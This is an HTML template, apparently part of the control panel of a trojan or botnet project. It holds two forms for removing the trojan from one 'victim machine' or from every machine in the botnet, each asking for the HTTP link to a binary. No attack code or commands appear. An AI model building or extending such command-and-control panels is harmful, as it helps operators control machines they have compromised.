<app-menu></app-menu>
<h2>REMOVE TROJAN FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to remove Trojan from Victim Machine.</p>
  <p>Link HTTP server where binary is(http://localhost)<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>REMOVE TROJAN FROM ALL VICTIM MACHINES - BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Execute this module to remove Trojan from all Victim Machines.</p>
  <p>Link HTTP server where binary is(http://localhost)<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
